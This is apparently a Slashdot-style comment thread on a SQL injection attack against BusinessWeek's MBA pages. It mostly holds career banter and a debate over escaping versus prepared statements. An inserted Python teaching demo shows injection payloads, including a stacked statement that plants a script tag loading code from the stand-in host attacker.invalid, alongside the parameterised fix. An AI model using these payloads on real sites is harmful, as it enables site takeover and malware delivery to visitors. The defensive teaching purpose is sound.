SQL Injection Turns BusinessWeek Into Viral Replicator
martins writes "The website of popular magazine BusinessWeek has been attacked via SQL injection in an attempt to infect its readership with malware. Hundreds of pages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected."
You haven't seen the modern MBA, have you? Almost half of the MBA students have computer science degrees and have been working professionally for at least 5 years. Many of them, while good at what they do, want to further their career, so they go for an MBA so they'll be considered qualified for promotion. Not everyone wants to be a basic programmer for the rest of their life; they'd much rather have influence in the process and the design and spend less time doing the drudge work.
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
TFA: "the code injected into BusinessWeek's website points to a Russian website that is currently down and not delivering further malicious code."
Seriously? Why is it that these people always point to their site? Wouldn't you figure that, with a bit of injection, they could put the damn thing in the database? It's never made any sense to me. Anyone have any insights?
Also, they always waste these opportunities to replace real headlines with those from The Onion... if they're going to do something malicious, they should at least do it with style...
Many of them while good at what they do
Not everyone wants to be a basic programmer for the rest of their life
Pretty much all of the *GOOD* programmers *DO* want to program for the rest of their lives (while I wouldn't say "basic programmer"... most want to be Dev Lead / Architect type coders, but coders nonetheless). And being Dev Lead / Architect is not the type of position that goes to the MBA grads... MBAs are for people who want to go into Management / Project Management.
I've been in the industry since 1994 and am one of the top database developers in my company. And I don't see myself as being a manager any time soon. I enjoy programming too much. [This is in a large corporation where a manager is not a technical manager; small companies where "Dev Lead" equates to manager might be a different situation.]
Layne
I never understood how SQL injection happened on major sites until it happened to someone I know. (Wow, that sounded like a bad plug for some unknown disease... anyway...) Initially he absolutely refused to believe that it was SQL injection because "his application wasn't vulnerable to that!" Finally, in the face of overwhelming truth, it dawned on him that it was... so what happened? Oh, the database got cleaned up from a backup... but no code was changed. Then they did it again a short while later and he caught a clue and fixed it up. So, sadly... I've seen people do the same thing; it happens.
You are using English. Please learn the difference between loose and lose; they're, there, and their; your and you're.
They just don't teach anything about security in schools. We interviewed an intern candidate this spring and asked her how one would avoid a SQL injection attack.
Her response: "Don't use Microsoft products."
Swing and a miss!
The candidate's sample code had a big ol' SQL injection vulnerability. Yet the instructor raved over his project.
The fact that "mysql_real_escape_string" or whatever exists is an example of that: string escaping relies on string manipulation tricks to make things "secure". On top of being potentially vulnerable to any problem in the server (which obviously cannot be gotten around), it is also vulnerable to anything on the language side: for example, a string vulnerability would also make your queries vulnerable. Two attack vectors.
It's a workaround, a cheat, a hack. A prepared statement is handled by the driver and/or by the server itself, which compiles your statement and then passes the parameters (like you would to a stored procedure or a function) at the binary level, on an RDBMS-by-RDBMS basis... That is, the vulnerabilities at the string level of MySQL are not the same as Postgres's, which are not the same as Oracle's, DB2's, or SQL Server's, etc.
On top of that, prepared statements will (in most RDBMSs) compile and cache the statement and be able to reuse it whenever it is needed (basically, whenever the query is the same except for the parameters), which enhances performance.
So there's simply no reason to use string escaping, and there hasn't been for ages.
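As an added illustration of the distinction this post draws (not code from the thread or from BusinessWeek's site), the following Python runs against an in-memory SQLite database. The table, its two rows, the function names and the host attacker.invalid are all constructed for the example. It shows three things the post argues: concatenation lets input change the query, quote-escaping only helps when the value sits inside quotes, and a single stacked statement can rewrite every row of a table, which is how a whole site section ends up carrying the same script tag. The parameterised versions receive the same payloads and treat them as plain values.

```python
import sqlite3


def make_db():
    # Constructed, hypothetical schema standing in for employer-listing pages.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE postings (id INTEGER PRIMARY KEY, employer TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO postings (employer, body) VALUES (?, ?)",
        [("Acme Corp", "Hiring MBAs"), ("Globex", "Summer internships")])
    conn.commit()
    return conn


# 1. Plain concatenation: the input becomes part of the SQL grammar.
def find_vulnerable(conn, employer):
    sql = ("SELECT id, employer, body FROM postings WHERE employer = '"
           + employer + "'")
    return conn.execute(sql).fetchall()


# 2. Escaping in the mysql_real_escape_string spirit. Doubling single quotes
#    is the SQLite rule; it only protects a value that is itself quoted.
def naive_escape(value):
    return value.replace("'", "''")


def find_by_id_escaped(conn, posting_id):
    # Numeric context: there is no quote for the escaper to defend, so
    # "1 OR 1=1" passes through unchanged and rewrites the WHERE clause.
    sql = ("SELECT id, employer, body FROM postings WHERE id = "
           + naive_escape(posting_id))
    return conn.execute(sql).fetchall()


# 3. Stacked statements through an API that executes a whole script
#    (executescript). One injected id appends a <script> tag to every row,
#    the mass-injection pattern the story describes.
def set_body_vulnerable(conn, posting_id, body):
    sql = ("UPDATE postings SET body = '" + naive_escape(body)
           + "' WHERE id = " + posting_id)
    conn.executescript(sql)


# 4. Parameterised queries: the statement text is fixed and the driver binds
#    the value separately, so the same payloads are just data.
def find_safe(conn, employer):
    return conn.execute(
        "SELECT id, employer, body FROM postings WHERE employer = ?",
        (employer,)).fetchall()


def find_by_id_safe(conn, posting_id):
    # SQLite applies numeric affinity to the bound text; "1" matches id 1,
    # "1 OR 1=1" is not a number and matches nothing.
    return conn.execute(
        "SELECT id, employer, body FROM postings WHERE id = ?",
        (posting_id,)).fetchall()


def infected_count(conn):
    return conn.execute(
        "SELECT COUNT(*) FROM postings WHERE body LIKE '%<script%'").fetchone()[0]


# Constructed payload: closes the intended UPDATE and adds a second one.
MASS_PAYLOAD = ("2; UPDATE postings SET body = body || "
                "'<script src=http://attacker.invalid/x.js></script>'")

if __name__ == "__main__":
    conn = make_db()
    print(len(find_vulnerable(conn, "' OR '1'='1")), "rows from concatenation")
    print(len(find_by_id_escaped(conn, "1 OR 1=1")), "rows despite escaping")
    print(len(find_safe(conn, "' OR '1'='1")), "rows with a bound parameter")
    set_body_vulnerable(conn, MASS_PAYLOAD, "updated")
    print(infected_count(conn), "rows now carry the injected script tag")
```

The point of the escaped-but-unquoted case is that escaping is a property of one call site, not of the query; a bound parameter is typed by the driver and cannot be promoted to SQL regardless of where it appears.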
I'd be really curious to know what he thought of it afterwards, and whether having an MBA really helped him understand this other world. I get the distinct impression that an MBA is the business-world equivalent of an MCSE: it gives you some basic knowledge and impresses the clueless but isn't really very useful.
If you mod me Overrated, you are admitting that you have no penis.
Just a quick question: why, exactly, do MBAs need to know calculus?
Please, I'm not following.
"In the fall of 1972 President Nixon announced that the rate of increase of inflation was decreasing. This was the first time a sitting president used the third derivative to advance his case for reelection." http://www.daviddarling.info/encyclopedia/D/derivative.html
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
No, to be a good architect you have to have DOMAIN knowledge, not business knowledge. You don't have to know how to turn a profit or what an ROI is. You have to have technical knowledge of the requirements and the varied means by which you could possibly implement a solution.
And a master's in CS probably wouldn't be needed, because these "business environments" you speak of never tend to do anything cutting-edge in terms of the things that you do in getting a master's in CS: further research into computer science, not becoming a better programmer.
And for the love of God, stop talking about writing databases like it's "coding". A database developer is not a coder or a programmer. Someone who actually writes programs to interact with the database is.
It doesn't take a genius to write a hit song or invent a brilliant product either; it takes ingenuity and creativity mixed with some experience. But your job isn't to be a "good programmer", it's to be a good software engineer.
It doesn't take a genius to write Hello World, but it might take more of a genius to realize he doesn't need to write Hello World anymore; he can write a program to do it for him.
all in all you sound increasingly full of it.
lol "creating the code is a piece of cake"
Sort of like typing a book is a piece of cake too; it's figuring out what to write that's the challenge. And God forbid you knew anything about software development, you'd be unit testing the software you wrote.
In short, if you want to be a software architect, knowing something about the field your software is in is just a bit more important than knowing about "business". Knowing the figures and profit margins and the financial business strategy: not so important. Understanding the technical domain of the software you are developing, how clients would use your software, and experience using and designing software in similar fields (especially using Go4 patterns): far more important.
Thanks for demonstrating the pig-headed naivety that you can always throw a couple more "business-minded managers" at a problem to solve it.
"Jazz isn't dead, it just smells funny" ~Frank Zappa
EdelFactor